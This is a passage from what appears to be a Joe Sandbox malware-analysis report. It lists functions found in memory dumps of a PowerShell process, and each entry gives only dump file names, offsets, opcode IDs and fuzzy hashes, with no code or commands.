                                                                      • Source File: 00000005.00000002.1746245921.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7400000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 464187fd28c3bf610808e8048f0cf42b98f5f4d5ff463e0088418d9d37a68446
                                                                      • Instruction ID: accc1bda018dfc92d0aa515a3c6cb5a4fdbbf0c785d4e17322596b9e37cfa414
                                                                      • Opcode Fuzzy Hash: 464187fd28c3bf610808e8048f0cf42b98f5f4d5ff463e0088418d9d37a68446
                                                                      • Instruction Fuzzy Hash: 28118BB0B10206CFDB20CF58C988BABB7E5BB46221F448077D908872E1D7B1E851CBE1
                                                                      Function 00BCF3D3 Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739548138.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_bcd000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 97445b17e520f814378829faa67ba79061bab103a32ab6c15715ac3201c2f727
                                                                      • Instruction ID: 551ca5ac24005479509658364aedb683a24cd763c10a678c0a4c0082ca88c21d
                                                                      • Opcode Fuzzy Hash: 97445b17e520f814378829faa67ba79061bab103a32ab6c15715ac3201c2f727
                                                                      • Instruction Fuzzy Hash: B8216D76504241DFCB0ACF10D5C4B26BBB2FB48314F24C5EDD9494A656C33AD956CB91
                                                                      Function 00BCF027 Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739548138.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_bcd000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7ff28159916af3c1565c82e67f2b531337ed64e047a92009350b64a0d4c4a9ec
                                                                      • Instruction ID: 111ed96be3cb7fd724f10255d66c54b4ca262a7238276f35804f753abda6fd3d
                                                                      • Opcode Fuzzy Hash: 7ff28159916af3c1565c82e67f2b531337ed64e047a92009350b64a0d4c4a9ec
                                                                      • Instruction Fuzzy Hash: 11118E75504280DFDB15CF14D5C4B25BFA2FB44714F28C6EED8494B656C33AD84ACB51
                                                                      Function 02D9E328 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 429d3366a570a48de60ea3977a44e710bac0fdb500d4a3d0b5cfb002513a5ee3
                                                                      • Instruction ID: 864b0f730f50ff55da7d54af5f3b0a2e0fd3c19638c2460b0f2137e74dbcaea2
                                                                      • Opcode Fuzzy Hash: 429d3366a570a48de60ea3977a44e710bac0fdb500d4a3d0b5cfb002513a5ee3
                                                                      • Instruction Fuzzy Hash: 0F114CB1900349CFDB20DF9AC544BDEBBF4EB48314F24846EE548A7341D339A945CBA5
                                                                      Function 02D9E774 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05d69c86f6572268bfb8e05f6a77bf5a957d714831607a15bd9c2b896b1b4a3c
                                                                      • Instruction ID: cfcec64a9624023e78998f8f81499cde0388f313c55777967f8134de1ef0ebb0
                                                                      • Opcode Fuzzy Hash: 05d69c86f6572268bfb8e05f6a77bf5a957d714831607a15bd9c2b896b1b4a3c
                                                                      • Instruction Fuzzy Hash: 7601BC32A0C3C69FCB1386788C622D6BFB49F4B124F0D02EBD9C19B2A3E7145916C352
                                                                      Function 02D9BCE0 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b89e1b4862f21ede2eaf3479a875b9512408662c6f8fd7be096290a75be204ce
                                                                      • Instruction ID: 4d51b173e3b53b2980f97a07ecf2380320cfa296e5c4cbc29c4e3b726fd18368
                                                                      • Opcode Fuzzy Hash: b89e1b4862f21ede2eaf3479a875b9512408662c6f8fd7be096290a75be204ce
                                                                      • Instruction Fuzzy Hash: 2C11AD316083448FDB18CB7AD494B9A7FF5AF46214B1884EEE48AC77A2DB20EC81C701
                                                                      Function 02D9E100 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 46274855ab4b855a832a25dd94f7f0491f74d8445c8fada1d38996f04591eec2
                                                                      • Instruction ID: 173f7b7b98422eb0e27f3207c85dbce48377729b95cde431d57a1a559e61b7a9
                                                                      • Opcode Fuzzy Hash: 46274855ab4b855a832a25dd94f7f0491f74d8445c8fada1d38996f04591eec2
                                                                      • Instruction Fuzzy Hash: A11135302047408FC728DF75C08485ABBF2EF8921532089ADD48A8B7A1DB32E802CB40
                                                                      Function 02D9DE98 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a87d4b2421a461674b70b86ff3c16eae9d29cc06ea8a02bae5f88f4440269a67
                                                                      • Instruction ID: 0d29a8f62d36c9e59ea2be7c2ed49665f8e529aed70dabe4203c9dec539d2a32
                                                                      • Opcode Fuzzy Hash: a87d4b2421a461674b70b86ff3c16eae9d29cc06ea8a02bae5f88f4440269a67
                                                                      • Instruction Fuzzy Hash: 62018C35B002148FCF119BB4E908AAEBBB6FF88215F14446DE50AD3342DB32A911CB90
                                                                      Function 02D9DCD9 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 190f5b91624a284a955e5ceb7b19827baaf963f0966297db61e902c4b5f34da0
                                                                      • Instruction ID: 4e174f06daac19682e8582987f6a62db3b0f3847c6e5043b5443b8d68e2584ba
                                                                      • Opcode Fuzzy Hash: 190f5b91624a284a955e5ceb7b19827baaf963f0966297db61e902c4b5f34da0
                                                                      • Instruction Fuzzy Hash: ED01FE75B091845FCF069778D4505FDBFB29F8E124B1844EEE4C29B352D7214C46CB61
                                                                      Function 02D9BF10 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ddade4f1327d5adaa6ae2ff485363cd24c93ad7269ea01ec71e1311aff27e8e
                                                                      • Instruction ID: 7116ad7215751143d36fe1d475f5d994de0cc44783558581560454b475e0a05d
                                                                      • Opcode Fuzzy Hash: 3ddade4f1327d5adaa6ae2ff485363cd24c93ad7269ea01ec71e1311aff27e8e
                                                                      • Instruction Fuzzy Hash: F301F4313092A41FD7118BB99C609FB7FF9DF8A22071940ABF881C7362C6B08C04C760
                                                                      Function 00BCD01D Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739548138.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_bcd000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 07298eb75aeec28a05ea2c3fd4ececb521ed18a7cfd32748ead8c7bbb69f94bd
                                                                      • Instruction ID: 3bccc79910432282df5f0c60d455ce0f3ec55a870eac53b74a6a653f8e82f8c5
                                                                      • Opcode Fuzzy Hash: 07298eb75aeec28a05ea2c3fd4ececb521ed18a7cfd32748ead8c7bbb69f94bd
                                                                      • Instruction Fuzzy Hash: 8301A7755043409BE7208E19CDC4F67BBD8DF42324F18C5BEED490B142C6799941CAB1
                                                                      Function 00BCD006 Relevance: .0, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739548138.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_bcd000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 82c24e12b3b920b515e08caf6a3b2d7a15275036d2bdc5496d77aa61752a9d1c
                                                                      • Instruction ID: 4d3841a1d7ca830b73ab512660b170e38bf324c4bbb0c0eed388ce85fb6f0576
                                                                      • Opcode Fuzzy Hash: 82c24e12b3b920b515e08caf6a3b2d7a15275036d2bdc5496d77aa61752a9d1c
                                                                      • Instruction Fuzzy Hash: 65015E6640E3C09FD7168B258D94B66BFA4DF53224F1981DBDC888F193C2695848CB72
                                                                      Function 02D97958 Relevance: .0, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3f3cb1a62389db53912efb70642ee11170b661b14bb079682575c3f5816b0828
                                                                      • Instruction ID: 4725f4039e842c000527b579ec3c375fa7173629370cb13d16d1da217ac2d337
                                                                      • Opcode Fuzzy Hash: 3f3cb1a62389db53912efb70642ee11170b661b14bb079682575c3f5816b0828
                                                                      • Instruction Fuzzy Hash: 0EF0C8356053506FC7158779E844A6FBBE5EF8966070406AEE08AC7292CE645C45C771
                                                                      Function 02D990D0 Relevance: .0, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d74a7f00f2ea5920955a5f9f61dfeeb9d2db1e98b95368a63d15859c440339ad
                                                                      • Instruction ID: 4233d453c7961afbc7ecc224d97d7b2a4cc4a212931b11c4fbfd1e3a91a01396
                                                                      • Opcode Fuzzy Hash: d74a7f00f2ea5920955a5f9f61dfeeb9d2db1e98b95368a63d15859c440339ad
                                                                      • Instruction Fuzzy Hash: 6B01F2726082804FD7065B7890247AB3FB1EF83714F2840DAD8848B353DE352C06C7A1
                                                                      Function 00BCD9A7 Relevance: .0, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739548138.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_bcd000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 605186db9873007b72194698c72c0c584a447e98c8618764e2d5061f57e0300f
                                                                      • Instruction ID: 5f9155a39954ff70f4992cdb29528d4f1ab54b8c84eaf7927fa534f0ce13e018
                                                                      • Opcode Fuzzy Hash: 605186db9873007b72194698c72c0c584a447e98c8618764e2d5061f57e0300f
                                                                      • Instruction Fuzzy Hash: B7F0E77A200600AF97248F0AD985C26FBE9EBD4770719C5AAE84A4B612C671FC41CAA0
                                                                      Function 02D9DE38 Relevance: .0, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ce7df5dc4a63dc72aab2206cd97513f3b3956bf7d72d9613d7f81593935148d2
                                                                      • Instruction ID: 06247d9f9caf9b49d1bf5906e558ca32c4ece6c0733da18e8aa7ef47fbba6812
                                                                      • Opcode Fuzzy Hash: ce7df5dc4a63dc72aab2206cd97513f3b3956bf7d72d9613d7f81593935148d2
                                                                      • Instruction Fuzzy Hash: 36F058383042408FC7019B19D8949A6BBFAEFCA61532900EAE584CB732DBA1DC12CB90
                                                                      Function 02D99158 Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 77a564723d5edc367d79c26ed6416f856165aeeea817983927465909bd49e38a
                                                                      • Instruction ID: 149ba46b763b233113aac5d22cf3620f250198cf465f4f8ebb7b70c63f8d0dc6
                                                                      • Opcode Fuzzy Hash: 77a564723d5edc367d79c26ed6416f856165aeeea817983927465909bd49e38a
                                                                      • Instruction Fuzzy Hash: EFF090719093804FD762CB7894A83EA7FF1EF06310F1444AED48EC7252C7342985CB50
                                                                      Function 02D97968 Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1700bb4979501fa038f6108dd20e73e4bc2dec2bf5ded110e76f56943f881ebb
                                                                      • Instruction ID: b1e2d7a12e7060ecaff973be2bcb5070d91c6cf67a3f07d25c2cb04c14c1cf0e
                                                                      • Opcode Fuzzy Hash: 1700bb4979501fa038f6108dd20e73e4bc2dec2bf5ded110e76f56943f881ebb
                                                                      • Instruction Fuzzy Hash: 7CF0A0727007149FDB109B6AE844B6FB7EAEB88671B40092DF18AC3340DF70AD4587B1
                                                                      Function 00BCD998 Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739548138.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_bcd000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 208c3e443681a00207d2ac9a7a394ab24df3046ba71bbb158d3ff84015b11827
                                                                      • Instruction ID: f0bd0be64b3af8b19ad16fa91610bf6ef076c334fbe5d5365ac3aaef0f6df5dc
                                                                      • Opcode Fuzzy Hash: 208c3e443681a00207d2ac9a7a394ab24df3046ba71bbb158d3ff84015b11827
                                                                      • Instruction Fuzzy Hash: 84F0F979100640AFD725CF06CD85D23BBF9EB89724B19859DA85A4B752C671FC42CF60
                                                                      Function 02D990E8 Relevance: .0, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 59cba85cc75968c18f64ce7ef1b2924b821be52c882be9e1e6c01565c575f82c
                                                                      • Instruction ID: 98d9e93efcf9c8e1e86913bcbb7b5a669a1bb09916bea43a44b0e86ff28779e0
                                                                      • Opcode Fuzzy Hash: 59cba85cc75968c18f64ce7ef1b2924b821be52c882be9e1e6c01565c575f82c
                                                                      • Instruction Fuzzy Hash: FAF027757041045BD704AB68C004BAF7BE6EFC1B15F20816EE90957385CE392C41CBE0
                                                                      Function 02D97697 Relevance: .0, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: effc2822c21c42267dbd1bf3cc375842788341a504429164114a52614b70da7b
                                                                      • Instruction ID: efc8dbe764f365acbd87b8d127dd194e859ce9b3491430c9e8aab48b8cb82fe7
                                                                      • Opcode Fuzzy Hash: effc2822c21c42267dbd1bf3cc375842788341a504429164114a52614b70da7b
                                                                      • Instruction Fuzzy Hash: DFF08C79300128CFDB109B689800B9AB7E2EBC9655789419AF509CB310DF74CC028B90
                                                                      Function 02D9896A Relevance: .0, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7f9a26de2f545b8630b14935814a13d46e509880dcabf770b62a3b97fc9c57b9
                                                                      • Instruction ID: c691fdce1fcb66ec05c209aa192869bca67ebe7d7b817c2d4ad0289dcd991435
                                                                      • Opcode Fuzzy Hash: 7f9a26de2f545b8630b14935814a13d46e509880dcabf770b62a3b97fc9c57b9
                                                                      • Instruction Fuzzy Hash: 12F0823530D2D05FCB0B677464286AE7FA1EFC6325F0900DED9458B253CE680C46C795
                                                                      Function 02D9DE48 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6aa79bcf2fd0162812ecd640d8b60e61dbeb9a91ed1e957faaf1aefe5ff95f1a
                                                                      • Instruction ID: a894a79594d2e26ae57d48394a57ce23026d5eb54ba3fb7a064f9253a5e6099b
                                                                      • Opcode Fuzzy Hash: 6aa79bcf2fd0162812ecd640d8b60e61dbeb9a91ed1e957faaf1aefe5ff95f1a
                                                                      • Instruction Fuzzy Hash: 9BE0C2393002108F8710AB1ED498D66B7EAAFCA66532900A9E589CB731DBA1EC41CB94
                                                                      Function 02D9E92E Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1d66f2ee42ab73843da0b67c2ba6f4b718bb8115ee3fe06798db0610ca8f4ee2
                                                                      • Instruction ID: 2293c137511d9f5da3f8dfdf85aa7b5570b5431106f187da5458ae720f01ac82
                                                                      • Opcode Fuzzy Hash: 1d66f2ee42ab73843da0b67c2ba6f4b718bb8115ee3fe06798db0610ca8f4ee2
                                                                      • Instruction Fuzzy Hash: 23F06D39A05114DFCB00CB98EA85D9DFBB2FF48625B258555F905A7351CB31ED41CF40
                                                                      Function 02D9AF88 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4d0c96455731da8b4c10ecbfe551a7f8e6e512060160792f5c41ba85483be6bb
                                                                      • Instruction ID: 46544b40cbda42c32fb4a7c09fbd7ea5a081beb2f3cfca163458dbea3b1acb46
                                                                      • Opcode Fuzzy Hash: 4d0c96455731da8b4c10ecbfe551a7f8e6e512060160792f5c41ba85483be6bb
                                                                      • Instruction Fuzzy Hash: ECE0E5337083D52BCB16962968245A6BFB79AC752430D80FAF5848F396E9559C0683A1
                                                                      Function 02D99168 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b1b7f72bae89e048c597c6088cc50248862cdfbbdb7b207e57979d9a9a95d039
                                                                      • Instruction ID: d224edd1129ab3f08faa4a13c855e7097e49a43972050df4e191a24dea05ffa8
                                                                      • Opcode Fuzzy Hash: b1b7f72bae89e048c597c6088cc50248862cdfbbdb7b207e57979d9a9a95d039
                                                                      • Instruction Fuzzy Hash: A4F039709003044BD764DB78D49879ABBE5FB44310F50446DE50ED3341DB356980CB90
                                                                      Function 02D99549 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c21df792ee332728be70d7c4b4ae7de0c70c891a35485fda44b671eb6ce10454
                                                                      • Instruction ID: 4cb717ca49d330f208f0ebaf210192fd95e04b4bb8a87e40c7b8fc1513093700
                                                                      • Opcode Fuzzy Hash: c21df792ee332728be70d7c4b4ae7de0c70c891a35485fda44b671eb6ce10454
                                                                      • Instruction Fuzzy Hash: DAE01732B021256B9F9861AA59506FBA5CFCEC69A5B09403EFA09D7342EE60CC0197F1
                                                                      Function 02D98978 Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 55531357802cb70de1d048ce139f3fd62653225f9aa3dd51ee8cd15bb2b0865e
                                                                      • Instruction ID: 0233c21973204c85ec9ef41ec2661fa288c70bc2a8d61372ff0f256fc7f1c586
                                                                      • Opcode Fuzzy Hash: 55531357802cb70de1d048ce139f3fd62653225f9aa3dd51ee8cd15bb2b0865e
                                                                      • Instruction Fuzzy Hash: 9BE0863570461497CF0DBB79A51C7AEBA9AEFC4725F04002EE60A83342CF795D4687E9
                                                                      Function 02D99550 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 64d99f24553dd13d1bca8fdacf928332727191639037a77d90e5403e8dad0001
                                                                      • Instruction ID: f0c0541d5bd4ece6672c0592b24c48a036dbf6c7b4dfdbe93baeb416a1b98b53
                                                                      • Opcode Fuzzy Hash: 64d99f24553dd13d1bca8fdacf928332727191639037a77d90e5403e8dad0001
                                                                      • Instruction Fuzzy Hash: 63D05E327021212B4F9460BA19106BBA1CFCEC69A5B05403EFA09D3341EE50CC0193F1
                                                                      Function 02D9DCE8 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                      • Instruction ID: f95ef9b9c2a2f75b64e19cb455ebfc55ef078e56171ab927f1ad3b18f323e1d4
                                                                      • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                      • Instruction Fuzzy Hash: 91E08631B10114978B08995DD4104EDF7AADBCD220F04807AE94AA7340DA329D15C6E1
                                                                      Function 02D98739 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a2d41a7b20200f7bb1d47e3372d76e8d9273de57155e6f0e3ba949d2d564aaf0
                                                                      • Instruction ID: 928dfea9294c1bd3db58418fb0b2af755270f7054181c9c95347fdf9d36986ce
                                                                      • Opcode Fuzzy Hash: a2d41a7b20200f7bb1d47e3372d76e8d9273de57155e6f0e3ba949d2d564aaf0
                                                                      • Instruction Fuzzy Hash: C2E012318041498FCB49EB74D9194FE7F70FF16301B04019DD99687152EB355D96CBC4
                                                                      Function 02D98800 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
